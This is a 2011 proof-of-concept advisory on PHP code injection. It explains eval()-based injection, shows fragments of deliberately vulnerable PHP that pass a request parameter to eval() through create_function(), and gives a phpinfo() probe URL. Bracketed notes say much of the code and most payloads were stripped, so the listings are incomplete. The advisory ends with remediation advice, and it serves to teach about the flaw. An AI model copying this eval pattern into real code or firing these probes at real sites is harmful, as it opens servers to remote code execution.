|===============================================================================================|
|-----> [ID] : [SSB00000] |
|-----> [Title] : [PoC of PHP Code Injection] |
|-----> [Criticality] : [High] |
|-----> [Email] : [ssbostan@gmail.com] |
|-----> [Date] : [18/07/2011] |
|===============================================================================================|
######################################################################################### BOF ###
### Introduction
+
+ PHP Code Injection (PCI) is a vulnerability class in PHP applications in which attacker-controlled input ends up being executed as PHP code.
+ Two types of PCI attacks are:
+ 1- Injecting PHP code into PHP code (when the application passes the input to eval())
+ 2- Injecting input into the argument of some other sensitive function (when the application passes the input to a function such as system() or include())
+
+ With the first method the attacker can call any PHP function, because the injected text is parsed and executed as PHP.
+
+ For example:
+ you can call include(), system() or any other function from inside the eval()'d code.
+
+ but
+
+ With the second method the attacker is limited to what the function that receives the input can do.
+
+ For example:
+ if the source passes the input to system(), you can only execute operating-system commands (this is the Remote Command Execution, RCE, case).
+ or
+ if the source passes the input to include(), you can only include files or URLs (this is the Remote File Inclusion, RFI, case).
+
+ Attention:
+ because each variant of the second method already has its own name (RCE, RFI, ...), the term PCI is used here for the first method only.
+
+
+
### Vulnerable source codes
+
+ We have three sample codes for proof of concept.
+
+ PoC1 (5 lines):
+
+ [The PoC1 listing is missing from this copy of the advisory. Everything from the opening `<?php` tag to the first `?>` appears to have been stripped during extraction, so nothing of the script survives. From the PoC1 detection URL below, it evidently evaluated the `how` request parameter directly.]
+
+ PoC2 (6 lines):
+
+ [The beginning of the PoC2 listing is missing from this copy: the text from the opening `<?php` tag up to the first `\?>` inside the first preg_replace_callback() pattern appears to have been stripped during extraction. Only the tail of the script survives below; the first surviving fragment is the end of a statement that, judging by the parallel second statement, applies the same pattern and callback shape to `$how`.]
+ /si",create_function('$how','ob_start();eval("$how[2];");$return=ob_get_contents();ob_end_clean();return $return;'),$how);
+ $how=preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$how','ob_start();eval("print $how[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$how);
+ echo $how;
+ ?>
+
+ [Note on PoC2: the surviving code hands `$how[2]`, i.e. the text captured between `<?php`/`<?` and `?>` in `$how`, straight to eval() inside both callbacks. Since `$how` is the `how` request parameter (see Detection), any `<?php ... ?>` block in the request is executed server-side and its output is echoed back. create_function() is itself an eval() wrapper (it compiles its second argument from a string), so the callback bodies also go through eval(); it was deprecated in PHP 7.2 and removed in PHP 8.0, so this sample no longer runs on current PHP.]
+
+ PoC3 (5 lines):
+
+ [Only the last two lines of the PoC3 listing survive in this copy; the stripping stopped at a `?>` sequence that preceded `'.$how)`, so the missing part cannot be reconstructed from this copy.]
+ '.$how);
+ ?>
+
+
+
### Detection
+
+ PoC1:
+ http://website.com/page.php?how=phpinfo();
+
+ PoC2:
+ http://website.com/page.php?how=
+ [The PoC2 payload is missing from this copy. From the PoC2 source above, it must be a value containing a `<?php ... ?>` (or `<? ... ?>`) block, because only text inside those tags is captured and passed to eval(); a payload containing such tags would itself have been stripped during extraction.]
+
+ PoC3:
+ http://website.com/page.php?how=
+ or
+ http://website.com/page.php?how=
+ or
+ http://website.com/page.php?how=
+ [The three PoC3 payloads are missing from this copy, most likely for the same reason as the PoC2 payload.]
+
+ Note: in every case the root cause is the same - request data reaches eval() (directly, or via create_function()). The fix is not to filter the input but to remove the dynamic evaluation: never pass request data to eval()/create_function(), and where dynamic behaviour is really needed, map the input to a fixed allow-list of functions or templates.